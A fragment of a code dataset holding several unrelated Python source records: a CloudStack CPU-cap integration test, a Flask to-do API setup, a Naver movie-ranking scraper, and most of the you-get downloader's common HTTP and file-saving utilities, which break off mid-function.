serviceofferingid=cls.offering.id,\n mode=cls.services[\"mode\"],\n hostid=cls.host.id\n\n )\n cls._cleanup = [\n cls.offering,\n cls.account\n ]\n\n @classmethod\n def tearDownClass(cls):\n try:\n cls.apiclient = super(\n TestCpuCapServiceOfferings,\n cls).getClsTestClient().getApiClient()\n # Clean up, terminate the created templates\n cleanup_resources(cls.apiclient, cls._cleanup)\n\n except Exception as e:\n raise Exception(\"Warning: Exception during cleanup : %s\" % e)\n return\n\n @skipTestIf(\"hypervisorNotSupported\")\n @attr(tags=[\"advanced\", \"advancedns\", \"smoke\"], required_hardware=\"true\")\n def test_01_service_offering_cpu_limit_use(self):\n \"\"\"\n Test CPU Cap on KVM\n \"\"\"\n\n ssh_host = self.get_ssh_client(self.host.id, self.host.ipaddress, self.hostConfig[\"username\"], self.hostConfig[\"password\"], 10)\n\n #Get host CPU usage from top command before and after VM consuming 100% CPU\n find_pid_cmd = \"ps -ax | grep '%s' | head -1 | awk '{print $1}'\" % self.vm.id\n pid = ssh_host.execute(find_pid_cmd)[0]\n cpu_usage_cmd = \"top -b n 1 p %s | tail -1 | awk '{print $9}'\" % pid\n host_cpu_usage_before_str = ssh_host.execute(cpu_usage_cmd)[0]\n\n host_cpu_usage_before = round(float(host_cpu_usage_before_str))\n self.debug(\"Host CPU usage before the infinite loop on the VM: \" + str(host_cpu_usage_before))\n\n #Execute loop command in background on the VM\n ssh_vm = self.vm.get_ssh_client(reconnect=True)\n ssh_vm.execute(\"echo 'while true; do x=$(($x+1)); done' > cputest.sh\")\n ssh_vm.execute(\"sh cputest.sh > /dev/null 2>&1 &\")\n\n time.sleep(5)\n host_cpu_usage_after_str = ssh_host.execute(cpu_usage_cmd)[0]\n host_cpu_usage_after = round(float(host_cpu_usage_after_str))\n self.debug(\"Host CPU usage after the infinite loop on the VM: \" + str(host_cpu_usage_after))\n\n limit = 95\n self.assertTrue(host_cpu_usage_after < limit, \"Host CPU usage after VM usage increased is high\")\n\n return\n","repo_name":"apache/cloudstack","sub_path":"test/integration/smoke/test_service_offerings.py","file_name":"test_service_offerings.py","file_ext":"py","file_size_in_byte":36997,"program_lang":"python","lang":"en","doc_type":"code","stars":1557,"dataset":"github-code","pt":"32"} +{"seq_id":"36246499750","text":"import os\nimport secrets\n\nfrom flask import Flask\nfrom flask_migrate import Migrate\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_restx import Api\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\n# init SQLAlchemy so we can use it later in our models\ndb = SQLAlchemy()\n\napp = Flask(__name__)\napp.wsgi_app = ProxyFix(app.wsgi_app)\napi = Api(app,\n title='TO-DO LIST API',\n version='1.0',\n description='To-Do List API with Python-Flask',\n\tcontact='Berker Acir',\n\tcontact_email='berkeracir159@gmail.com'\n)\n\napp.config['SECRET_KEY'] = secrets.token_urlsafe(16)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'db.sqlite3')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n \ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\nimport models\nwith app.app_context():\n\tdb.create_all()\n\n@login_manager.user_loader\ndef load_user(user_id):\n\t# since the user_id is just the primary key of our user table, use it in the query for the user\n\treturn models.User.query.get(int(user_id))\n\nfrom auth import api as auth_ns\napi.add_namespace(auth_ns)\n\nfrom todo_lists import api as todo_lists_ns\napi.add_namespace(todo_lists_ns)\n\nfrom todo_list import api as todo_list_ns\napi.add_namespace(todo_list_ns)\n\n\nif __name__ == '__main__':\n\tapp.run()","repo_name":"berkeracir/to-do_list_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30766536656","text":"import urllib.request\nfrom bs4 import BeautifulSoup\n\nhtml = urllib.request.urlopen('http://movie.naver.com/movie/sdb/rank/rmovie.nhn')\nsoup = BeautifulSoup(html,'html.parser')\n\nindex = 1\nf = open('output_1.csv', 'w', encoding='utf-8')\nfor tr in soup.tbody.find_all('tr'):\n if tr.find('div', attrs={'class':\"tit3\"}):\n # try:\n print([str(index), tr.a['title'], tr.find('img', attrs=({\"class\":\"arrow\"})).attrs['alt']+tr.find('td', attrs={'class':\"range ac\"}).string])\n f.write('{0}, {1}, {2}, {3}\\n'.format(str(index), tr.a['title'], tr.find('img', attrs=({\"width\":\"7\"})).attrs['alt'],tr.find('td', attrs={'class':\"range ac\"}).string))\n index = index + 1\n # except: pass\nf.close()","repo_name":"sss6391/iot_python2019","sub_path":"03_Bigdata/01_Collection/03_Web_crawling/01_Beautiful_Soup/3_naver_movie_1.py","file_name":"3_naver_movie_1.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"192222713","text":"#!/usr/bin/env python\n\nimport io\nimport os\nimport re\nimport sys\nimport time\nimport json\nimport socket\nimport locale\nimport logging\nimport argparse\nimport ssl\nfrom http import cookiejar\nfrom importlib import import_module\nfrom urllib import request, parse, error\n\nfrom .version import __version__\nfrom .util import log, term\nfrom .util.git import get_version\nfrom .util.strings import get_filename, unescape_html\nfrom . import json_output as json_output_\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf8')\n\nSITES = {\n '163' : 'netease',\n '56' : 'w56',\n '365yg' : 'toutiao',\n 'acfun' : 'acfun',\n 'archive' : 'archive',\n 'baidu' : 'baidu',\n 'bandcamp' : 'bandcamp',\n 'baomihua' : 'baomihua',\n 'bigthink' : 'bigthink',\n 'bilibili' : 'bilibili',\n 'cctv' : 'cntv',\n 'cntv' : 'cntv',\n 'cbs' : 'cbs',\n 'coub' : 'coub',\n 'dailymotion' : 'dailymotion',\n 'douban' : 'douban',\n 'douyin' : 'douyin',\n 'douyu' : 'douyutv',\n 'ehow' : 'ehow',\n 'facebook' : 'facebook',\n 'fc2' : 'fc2video',\n 'flickr' : 'flickr',\n 'freesound' : 'freesound',\n 'fun' : 'funshion',\n 'google' : 'google',\n 'giphy' : 'giphy',\n 'heavy-music' : 'heavymusic',\n 'huomao' : 'huomaotv',\n 'iask' : 'sina',\n 'icourses' : 'icourses',\n 'ifeng' : 'ifeng',\n 'imgur' : 'imgur',\n 'in' : 'alive',\n 'infoq' : 'infoq',\n 'instagram' : 'instagram',\n 'interest' : 'interest',\n 'iqilu' : 'iqilu',\n 'iqiyi' : 'iqiyi',\n 'ixigua' : 'ixigua',\n 'isuntv' : 'suntv',\n 'iwara' : 'iwara',\n 'joy' : 'joy',\n 'kankanews' : 'bilibili',\n 'kakao' : 'kakao',\n 'khanacademy' : 'khan',\n 'ku6' : 'ku6',\n 'kuaishou' : 'kuaishou',\n 'kugou' : 'kugou',\n 'kuwo' : 'kuwo',\n 'le' : 'le',\n 'letv' : 'le',\n 'lizhi' : 'lizhi',\n 'longzhu' : 'longzhu',\n 'lrts' : 'lrts',\n 'magisto' : 'magisto',\n 'metacafe' : 'metacafe',\n 'mgtv' : 'mgtv',\n 'miomio' : 'miomio',\n 'missevan' : 'missevan',\n 'mixcloud' : 'mixcloud',\n 'mtv81' : 'mtv81',\n 'miaopai' : 'yixia',\n 'naver' : 'naver',\n '7gogo' : 'nanagogo',\n 'nicovideo' : 'nicovideo',\n 'pinterest' : 'pinterest',\n 'pixnet' : 'pixnet',\n 'pptv' : 'pptv',\n 'qingting' : 'qingting',\n 'qq' : 'qq',\n 'showroom-live' : 'showroom',\n 'sina' : 'sina',\n 'smgbb' : 'bilibili',\n 'sohu' : 'sohu',\n 'soundcloud' : 'soundcloud',\n 'ted' : 'ted',\n 'theplatform' : 'theplatform',\n 'tiktok' : 'tiktok',\n 'tucao' : 'tucao',\n 'tudou' : 'tudou',\n 'tumblr' : 'tumblr',\n 'twimg' : 'twitter',\n 'twitter' : 'twitter',\n 'ucas' : 'ucas',\n 'vimeo' : 'vimeo',\n 'wanmen' : 'wanmen',\n 'weibo' : 'miaopai',\n 'veoh' : 'veoh',\n 'vine' : 'vine',\n 'vk' : 'vk',\n 'xiaokaxiu' : 'yixia',\n 'xiaojiadianvideo' : 'fc2video',\n 'ximalaya' : 'ximalaya',\n 'xinpianchang' : 'xinpianchang',\n 'yizhibo' : 'yizhibo',\n 'youku' : 'youku',\n 'youtu' : 'youtube',\n 'youtube' : 'youtube',\n 'zhanqi' : 'zhanqi',\n 'zhibo' : 'zhibo',\n 'zhihu' : 'zhihu',\n}\n\ndry_run = False\njson_output = False\nforce = False\nskip_existing_file_size_check = False\nplayer = None\nextractor_proxy = None\ncookies = None\noutput_filename = None\nauto_rename = False\ninsecure = False\nm3u8 = False\npostfix = False\nprefix = None\n\nfake_headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'UTF-8,*;q=0.5',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.183' # Latest Edge\n}\n\nif sys.stdout.isatty():\n default_encoding = sys.stdout.encoding.lower()\nelse:\n default_encoding = locale.getpreferredencoding().lower()\n\n\ndef rc4(key, data):\n # all encryption algo should work on bytes\n assert type(key) == type(data) and type(key) == type(b'')\n state = list(range(256))\n j = 0\n for i in range(256):\n j += state[i] + key[i % len(key)]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n\n i = 0\n j = 0\n out_list = []\n for char in data:\n i += 1\n i &= 0xff\n j += state[i]\n j &= 0xff\n state[i], state[j] = state[j], state[i]\n prn = state[(state[i] + state[j]) & 0xff]\n out_list.append(char ^ prn)\n\n return bytes(out_list)\n\n\ndef general_m3u8_extractor(url, headers={}):\n m3u8_list = get_content(url, headers=headers).split('\\n')\n urls = []\n for line in m3u8_list:\n line = line.strip()\n if line and not line.startswith('#'):\n if line.startswith('http'):\n urls.append(line)\n else:\n seg_url = parse.urljoin(url, line)\n urls.append(seg_url)\n return urls\n\n\ndef maybe_print(*s):\n try:\n print(*s)\n except:\n pass\n\n\ndef tr(s):\n if default_encoding == 'utf-8':\n return s\n else:\n return s\n # return str(s.encode('utf-8'))[2:-1]\n\n\n# DEPRECATED in favor of match1()\ndef r1(pattern, text):\n m = re.search(pattern, text)\n if m:\n return m.group(1)\n\n\n# DEPRECATED in favor of match1()\ndef r1_of(patterns, text):\n for p in patterns:\n x = r1(p, text)\n if x:\n return x\n\n\ndef match1(text, *patterns):\n \"\"\"Scans through a string for substrings matched some patterns (first-subgroups only).\n\n Args:\n text: A string to be scanned.\n patterns: Arbitrary number of regex patterns.\n\n Returns:\n When only one pattern is given, returns a string (None if no match found).\n When more than one pattern are given, returns a list of strings ([] if no match found).\n \"\"\"\n\n if len(patterns) == 1:\n pattern = patterns[0]\n match = re.search(pattern, text)\n if match:\n return match.group(1)\n else:\n return None\n else:\n ret = []\n for pattern in patterns:\n match = re.search(pattern, text)\n if match:\n ret.append(match.group(1))\n return ret\n\n\ndef matchall(text, patterns):\n \"\"\"Scans through a string for substrings matched some patterns.\n\n Args:\n text: A string to be scanned.\n patterns: a list of regex pattern.\n\n Returns:\n a list if matched. empty if not.\n \"\"\"\n\n ret = []\n for pattern in patterns:\n match = re.findall(pattern, text)\n ret += match\n\n return ret\n\n\ndef launch_player(player, urls):\n import subprocess\n import shlex\n urls = list(urls)\n for url in urls.copy():\n if type(url) is list:\n urls.extend(url)\n urls = [url for url in urls if type(url) is str]\n assert urls\n if (sys.version_info >= (3, 3)):\n import shutil\n exefile=shlex.split(player)[0]\n if shutil.which(exefile) is not None:\n subprocess.call(shlex.split(player) + urls)\n else:\n log.wtf('[Failed] Cannot find player \"%s\"' % exefile)\n else:\n subprocess.call(shlex.split(player) + urls)\n\n\ndef parse_query_param(url, param):\n \"\"\"Parses the query string of a URL and returns the value of a parameter.\n\n Args:\n url: A URL.\n param: A string representing the name of the parameter.\n\n Returns:\n The value of the parameter.\n \"\"\"\n\n try:\n return parse.parse_qs(parse.urlparse(url).query)[param][0]\n except:\n return None\n\n\ndef unicodize(text):\n return re.sub(\n r'\\\\u([0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f][0-9A-Fa-f])',\n lambda x: chr(int(x.group(0)[2:], 16)),\n text\n )\n\n\n# DEPRECATED in favor of util.legitimize()\ndef escape_file_path(path):\n path = path.replace('/', '-')\n path = path.replace('\\\\', '-')\n path = path.replace('*', '-')\n path = path.replace('?', '-')\n return path\n\n\ndef ungzip(data):\n \"\"\"Decompresses data for Content-Encoding: gzip.\n \"\"\"\n from io import BytesIO\n import gzip\n buffer = BytesIO(data)\n f = gzip.GzipFile(fileobj=buffer)\n return f.read()\n\n\ndef undeflate(data):\n \"\"\"Decompresses data for Content-Encoding: deflate.\n (the zlib compression is used.)\n \"\"\"\n import zlib\n decompressobj = zlib.decompressobj(-zlib.MAX_WBITS)\n return decompressobj.decompress(data)+decompressobj.flush()\n\n\n# an http.client implementation of get_content()\n# because urllib does not support \"Connection: keep-alive\"\ndef getHttps(host, url, headers, debuglevel=0):\n import http.client\n\n conn = http.client.HTTPSConnection(host)\n conn.set_debuglevel(debuglevel)\n conn.request(\"GET\", url, headers=headers)\n resp = conn.getresponse()\n set_cookie = resp.getheader('set-cookie')\n\n data = resp.read()\n try:\n data = ungzip(data) # gzip\n data = undeflate(data) # deflate\n except:\n pass\n\n conn.close()\n return str(data, encoding='utf-8'), set_cookie\n\n\n# DEPRECATED in favor of get_content()\ndef get_response(url, faker=False):\n logging.debug('get_response: %s' % url)\n ctx = None\n if insecure:\n # ignore ssl errors\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n # install cookies\n if cookies:\n opener = request.build_opener(request.HTTPCookieProcessor(cookies))\n request.install_opener(opener)\n\n if faker:\n response = request.urlopen(\n request.Request(url, headers=fake_headers), None, context=ctx,\n )\n else:\n response = request.urlopen(url, context=ctx)\n\n data = response.read()\n if response.info().get('Content-Encoding') == 'gzip':\n data = ungzip(data)\n elif response.info().get('Content-Encoding') == 'deflate':\n data = undeflate(data)\n response.data = data\n return response\n\n\n# DEPRECATED in favor of get_content()\ndef get_html(url, encoding=None, faker=False):\n content = get_response(url, faker).data\n return str(content, 'utf-8', 'ignore')\n\n\n# DEPRECATED in favor of get_content()\ndef get_decoded_html(url, faker=False):\n response = get_response(url, faker)\n data = response.data\n charset = r1(r'charset=([\\w-]+)', response.headers['content-type'])\n if charset:\n return data.decode(charset, 'ignore')\n else:\n return data\n\n\ndef get_location(url, headers=None, get_method='HEAD'):\n logging.debug('get_location: %s' % url)\n\n if headers:\n req = request.Request(url, headers=headers)\n else:\n req = request.Request(url)\n req.get_method = lambda: get_method\n res = urlopen_with_retry(req)\n return res.geturl()\n\n\ndef urlopen_with_retry(*args, **kwargs):\n retry_time = 3\n for i in range(retry_time):\n try:\n if insecure:\n # ignore ssl errors\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n return request.urlopen(*args, context=ctx, **kwargs)\n else:\n return request.urlopen(*args, **kwargs)\n except socket.timeout as e:\n logging.debug('request attempt %s timeout' % str(i + 1))\n if i + 1 == retry_time:\n raise e\n # try to tackle youku CDN fails\n except error.HTTPError as http_error:\n logging.debug('HTTP Error with code{}'.format(http_error.code))\n if i + 1 == retry_time:\n raise http_error\n\n\ndef get_content(url, headers={}, decoded=True):\n \"\"\"Gets the content of a URL via sending a HTTP GET request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n\n logging.debug('get_content: %s' % url)\n\n req = request.Request(url, headers=headers)\n if cookies:\n # NOTE: Do not use cookies.add_cookie_header(req)\n # #HttpOnly_ cookies were not supported by CookieJar and MozillaCookieJar properly until python 3.10\n # See also:\n # - https://github.com/python/cpython/pull/17471\n # - https://bugs.python.org/issue2190\n # Here we add cookies to the request headers manually\n cookie_strings = []\n for cookie in list(cookies):\n cookie_strings.append(cookie.name + '=' + cookie.value)\n cookie_headers = {'Cookie': '; '.join(cookie_strings)}\n req.headers.update(cookie_headers)\n\n response = urlopen_with_retry(req)\n data = response.read()\n\n # Handle HTTP compression for gzip and deflate (zlib)\n content_encoding = response.getheader('Content-Encoding')\n if content_encoding == 'gzip':\n data = ungzip(data)\n elif content_encoding == 'deflate':\n data = undeflate(data)\n\n # Decode the response body\n if decoded:\n charset = match1(\n response.getheader('Content-Type', ''), r'charset=([\\w-]+)'\n )\n if charset is not None:\n data = data.decode(charset, 'ignore')\n else:\n data = data.decode('utf-8', 'ignore')\n\n return data\n\n\ndef post_content(url, headers={}, post_data={}, decoded=True, **kwargs):\n \"\"\"Post the content of a URL via sending a HTTP POST request.\n\n Args:\n url: A URL.\n headers: Request headers used by the client.\n decoded: Whether decode the response body using UTF-8 or the charset specified in Content-Type.\n\n Returns:\n The content as a string.\n \"\"\"\n if kwargs.get('post_data_raw'):\n logging.debug('post_content: %s\\npost_data_raw: %s' % (url, kwargs['post_data_raw']))\n else:\n logging.debug('post_content: %s\\npost_data: %s' % (url, post_data))\n\n req = request.Request(url, headers=headers)\n if cookies:\n # NOTE: Do not use cookies.add_cookie_header(req)\n # #HttpOnly_ cookies were not supported by CookieJar and MozillaCookieJar properly until python 3.10\n # See also:\n # - https://github.com/python/cpython/pull/17471\n # - https://bugs.python.org/issue2190\n # Here we add cookies to the request headers manually\n cookie_strings = []\n for cookie in list(cookies):\n cookie_strings.append(cookie.name + '=' + cookie.value)\n cookie_headers = {'Cookie': '; '.join(cookie_strings)}\n req.headers.update(cookie_headers)\n if kwargs.get('post_data_raw'):\n post_data_enc = bytes(kwargs['post_data_raw'], 'utf-8')\n else:\n post_data_enc = bytes(parse.urlencode(post_data), 'utf-8')\n response = urlopen_with_retry(req, data=post_data_enc)\n data = response.read()\n\n # Handle HTTP compression for gzip and deflate (zlib)\n content_encoding = response.getheader('Content-Encoding')\n if content_encoding == 'gzip':\n data = ungzip(data)\n elif content_encoding == 'deflate':\n data = undeflate(data)\n\n # Decode the response body\n if decoded:\n charset = match1(\n response.getheader('Content-Type'), r'charset=([\\w-]+)'\n )\n if charset is not None:\n data = data.decode(charset)\n else:\n data = data.decode('utf-8')\n\n return data\n\n\ndef url_size(url, faker=False, headers={}):\n if faker:\n response = urlopen_with_retry(\n request.Request(url, headers=fake_headers)\n )\n elif headers:\n response = urlopen_with_retry(request.Request(url, headers=headers))\n else:\n response = urlopen_with_retry(url)\n\n size = response.headers['content-length']\n return int(size) if size is not None else float('inf')\n\n\ndef urls_size(urls, faker=False, headers={}):\n return sum([url_size(url, faker=faker, headers=headers) for url in urls])\n\n\ndef get_head(url, headers=None, get_method='HEAD'):\n logging.debug('get_head: %s' % url)\n\n if headers:\n req = request.Request(url, headers=headers)\n else:\n req = request.Request(url)\n req.get_method = lambda: get_method\n res = urlopen_with_retry(req)\n return res.headers\n\n\ndef url_info(url, faker=False, headers={}):\n logging.debug('url_info: %s' % url)\n\n if faker:\n response = urlopen_with_retry(\n request.Request(url, headers=fake_headers)\n )\n elif headers:\n response = urlopen_with_retry(request.Request(url, headers=headers))\n else:\n response = urlopen_with_retry(request.Request(url))\n\n headers = response.headers\n\n type = headers['content-type']\n if type == 'image/jpg; charset=UTF-8' or type == 'image/jpg':\n type = 'audio/mpeg' # fix for netease\n mapping = {\n 'video/3gpp': '3gp',\n 'video/f4v': 'flv',\n 'video/mp4': 'mp4',\n 'video/MP2T': 'ts',\n 'video/quicktime': 'mov',\n 'video/webm': 'webm',\n 'video/x-flv': 'flv',\n 'video/x-ms-asf': 'asf',\n 'audio/mp4': 'mp4',\n 'audio/mpeg': 'mp3',\n 'audio/wav': 'wav',\n 'audio/x-wav': 'wav',\n 'audio/wave': 'wav',\n 'image/jpeg': 'jpg',\n 'image/png': 'png',\n 'image/gif': 'gif',\n 'application/pdf': 'pdf',\n }\n if type in mapping:\n ext = mapping[type]\n else:\n type = None\n if headers['content-disposition']:\n try:\n filename = parse.unquote(\n r1(r'filename=\"?([^\"]+)\"?', headers['content-disposition'])\n )\n if len(filename.split('.')) > 1:\n ext = filename.split('.')[-1]\n else:\n ext = None\n except:\n ext = None\n else:\n ext = None\n\n if headers['transfer-encoding'] != 'chunked':\n size = headers['content-length'] and int(headers['content-length'])\n else:\n size = None\n\n return type, ext, size\n\n\ndef url_locations(urls, faker=False, headers={}):\n locations = []\n for url in urls:\n logging.debug('url_locations: %s' % url)\n\n if faker:\n response = urlopen_with_retry(\n request.Request(url, headers=fake_headers)\n )\n elif headers:\n response = urlopen_with_retry(\n request.Request(url, headers=headers)\n )\n else:\n response = urlopen_with_retry(request.Request(url))\n\n locations.append(response.url)\n return locations\n\n\ndef url_save(\n url, filepath, bar, refer=None, is_part=False, faker=False,\n headers=None, timeout=None, **kwargs\n):\n tmp_headers = headers.copy() if headers is not None else {}\n # When a referer specified with param refer,\n # the key must be 'Referer' for the hack here\n if refer is not None:\n tmp_headers['Referer'] = refer\n if type(url) is list:\n chunk_sizes = [url_size(url, faker=faker, headers=tmp_headers) for url in url]\n file_size = sum(chunk_sizes)\n is_chunked, urls = True, url\n else:\n file_size = url_size(url, faker=faker, headers=tmp_headers)\n chunk_sizes = [file_size]\n is_chunked, urls = False, [url]\n\n continue_renameing = True\n while continue_renameing:\n continue_renameing = False\n if os.path.exists(filepath):\n if not force and (file_size == os.path.getsize(filepath) or skip_existing_file_size_check):\n if not is_part:\n if bar:\n bar.done()\n if skip_existing_file_size_check:\n log.w(\n 'Skipping {} without checking size: file already exists'.format(\n tr(os.path.basename(filepath))\n )\n )\n else:\n log.w(\n 'Skipping {}: file already exists'.format(\n tr(os.path.basename(filepath))\n )\n )\n else:\n if bar:\n bar.update_received(file_size)\n return\n else:\n if not is_part:\n if bar:\n bar.done()\n if not force and auto_rename:\n path, ext = os.path.basename(filepath).rsplit('.', 1)\n finder = re.compile(' \\([1-9]\\d*?\\)$')\n if (finder.search(path) is None):\n thisfile = path + ' (1).' + ext\n else:\n def numreturn(a):\n return ' (' + str(int(a.group()[2:-1]) + 1) + ').'\n thisfile = finder.sub(numreturn, path) + ext\n filepath = os.path.join(os.path.dirname(filepath), thisfile)\n print('Changing name to %s' % tr(os.path.basename(filepath)), '...')\n continue_renameing = True\n continue\n if log.yes_or_no('File with this name already exists. Overwrite?'):\n log.w('Overwriting %s ...' % tr(os.path.basename(filepath)))\n else:\n return\n elif not os.path.exists(os.path.dirname(filepath)):\n os.mkdir(os.path.dirname(filepath))\n\n temp_filepath = filepath + '.download' if file_size != float('inf') \\\n else filepath\n received = 0\n if not force:\n open_mode = 'ab'\n\n if os.path.exists(temp_filepath):\n received += os.path.getsize(temp_filepath)\n if bar:\n bar.update_received(os.path.getsize(temp_filepath))\n else:\n open_mode = 'wb'\n\n chunk_start = 0\n chunk_end = 0\n for i, url in enumerate(urls):\n received_chunk = 0\n chunk_start += 0 if i == 0 else chunk_sizes[i - 1]\n chunk_end += chunk_sizes[i]\n if received < file_size and received < chunk_end:\n if faker:\n tmp_headers = fake_headers\n '''\n if parameter headers passed in, we have it copied as tmp_header\n elif headers:\n headers = headers\n else:\n headers = {}\n '''\n if received:\n # chunk_start will always be 0 if not chunked\n tmp_headers['Range'] = 'bytes=' + str(received - chunk_start) + '-'\n if refer:\n tmp_headers['Referer'] = refer\n\n if timeout:\n response = urlopen_with_retry(\n request.Request(url, headers=tmp_headers), timeout=timeout\n )\n else:\n response = urlopen_with_retry(\n request.Request(url, headers=tmp_headers)\n )\n try:\n range_start = int(\n response.headers[\n 'content-range'\n ][6:].split('/')[0].split('-')[0]\n )\n end_length = int(\n response.headers['content-range'][6:].split('/')[1]\n )\n range_length = end_length - range_start\n except:\n content_length = response.headers['content-length']\n range_length = int(content_length) if content_length is not None \\\n else float('inf')\n\n if is_chunked: # always append if chunked\n open_mode = 'ab'\n elif file_size != received + range_length: # is it ever necessary?\n received = 0\n if bar:\n bar.received = 0\n open_mode = 'wb'\n\n with open(temp_filepath, open_mode) as output:\n while True:\n buffer = None\n try:\n buffer = response.read(1024 * 256)\n except socket.timeout:\n pass\n if not buffer:\n if is_chunked and received_chunk == range_length:\n break\n elif not is_chunked and received == file_size: # Download finished\n break\n # Unexpected termination. Retry request\n tmp_headers['Range'] = 'bytes=' + str(received - chunk_start) + '-'\n response = urlopen_with_retry(\n request.Request(url, headers=tmp_headers)\n )\n continue\n output.write(buffer)\n received += len(buffer)\n received_chunk += len(buffer)\n if bar:\n bar.update_received(len(buffer))\n\n assert received == os.path.getsize(temp_filepath), '%s == %s == %s' % (\n received, os.path.getsize(temp_filepath), temp_filepath\n )\n\n if os.access(filepath, os.W_OK):\n # on Windows rename could fail if destination filepath exists\n os.remove(filepath)\n os.rename(temp_filepath, filepath)\n\n\nclass SimpleProgressBar:\n term_size = term.get_terminal_size()[1]\n\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n self.speed = ''\n self.last_updated = time.time()\n\n total_pieces_len = len(str(total_pieces))\n # 38 is the size of all statically known size in self.bar\n total_str = '%5s' % round(self.total_size / 1048576, 1)\n total_str_width = max(len(total_str), 5)\n self.bar_size = self.term_size - 28 - 2 * total_pieces_len \\\n - 2 * total_str_width\n self.bar = '{:>4}%% ({:>%s}/%sMB) ├{:─<%s}┤[{:>%s}/{:>%s}] {}' % (\n total_str_width, total_str, self.bar_size, total_pieces_len,\n total_pieces_len\n )\n\n def update(self):\n self.displayed = True\n bar_size = self.bar_size\n percent = round(self.received * 100 / self.total_size, 1)\n if percent >= 100:\n percent = 100\n dots = bar_size * int(percent) // 100\n plus = int(percent) - dots // bar_size * 100\n if plus > 0.8:\n plus = '█'\n elif plus > 0.4:\n plus = '>'\n else:\n plus = ''\n bar = '█' * dots + plus\n bar = self.bar.format(\n percent, round(self.received / 1048576, 1), bar,\n self.current_piece, self.total_pieces, self.speed\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n time_diff = time.time() - self.last_updated\n bytes_ps = n / time_diff if time_diff else 0\n if bytes_ps >= 1024 ** 3:\n self.speed = '{:4.0f} GB/s'.format(bytes_ps / 1024 ** 3)\n elif bytes_ps >= 1024 ** 2:\n self.speed = '{:4.0f} MB/s'.format(bytes_ps / 1024 ** 2)\n elif bytes_ps >= 1024:\n self.speed = '{:4.0f} kB/s'.format(bytes_ps / 1024)\n else:\n self.speed = '{:4.0f} B/s'.format(bytes_ps)\n self.last_updated = time.time()\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass PiecesProgressBar:\n def __init__(self, total_size, total_pieces=1):\n self.displayed = False\n self.total_size = total_size\n self.total_pieces = total_pieces\n self.current_piece = 1\n self.received = 0\n\n def update(self):\n self.displayed = True\n bar = '{0:>5}%[{1:<40}] {2}/{3}'.format(\n '', '=' * 40, self.current_piece, self.total_pieces\n )\n sys.stdout.write('\\r' + bar)\n sys.stdout.flush()\n\n def update_received(self, n):\n self.received += n\n self.update()\n\n def update_piece(self, n):\n self.current_piece = n\n\n def done(self):\n if self.displayed:\n print()\n self.displayed = False\n\n\nclass DummyProgressBar:\n def __init__(self, *args):\n pass\n\n def update_received(self, n):\n pass\n\n def update_piece(self, n):\n pass\n\n def done(self):\n pass\n\n\ndef get_output_filename(urls, title, ext, output_dir, merge, **kwargs):\n # lame hack for the --output-filename option\n global output_filename\n if output_filename:\n result = output_filename\n if kwargs.get('part', -1) >= 0:\n result = '%s[%02d]' % (result, kwargs.get('part'))\n if ext:\n result = '%s.%s' % (result, ext)\n return result\n\n merged_ext = ext\n if (len(urls) > 1) and merge:\n from .processor.ffmpeg import has_ffmpeg_installed\n if ext in ['flv', 'f4v']:\n if has_ffmpeg_installed():\n merged_ext = 'mp4'\n else:\n merged_ext = 'flv'\n elif ext == 'mp4':\n merged_ext = 'mp4'\n elif ext == 'ts':\n if has_ffmpeg_installed():\n merged_ext = 'mkv'\n else:\n merged_ext = 'ts'\n result = title\n if kwargs.get('part', -1) >= 0:\n result = '%s[%02d]' % (result, kwargs.get('part'))\n result = '%s.%s' % (result, merged_ext)\n return result.replace(\"'\", \"_\")\n\ndef print_user_agent(faker=False):\n urllib_default_user_agent = 'Python-urllib/%d.%d' % sys.version_info[:2]\n user_agent = fake_headers['User-Agent'] if faker else urllib_default_user_agent\n print('User Agent: %s' % user_agent)\n\ndef download_urls(\n urls, title, ext, total_size, output_dir='.', refer=None, merge=True,\n faker=False, headers={}, **kwargs\n):\n assert urls\n if json_output:\n json_output_.download_urls(\n urls=urls, title=title, ext=ext, total_size=total_size,\n refer=refer\n )\n return\n if dry_run:\n print_user_agent(faker=faker)\n try:\n print('Real URLs:\\n%s' % '\\n'.join(urls))\n except:\n print('Real URLs:\\n%s' % '\\n'.join([j for i in urls for j in i]))\n return\n\n if player:\n launch_player(player, urls)\n return\n\n if not total_size:\n try:\n total_size = urls_size(urls, faker=faker, headers=headers)\n except:\n import traceback\n traceback.print_exc(file=sys.stdout)\n pass\n\n title = tr(get_filename(title))\n if postfix and 'vid' in kwargs:\n title = \"%s [%s]\" % (title, kwargs['vid'])\n if 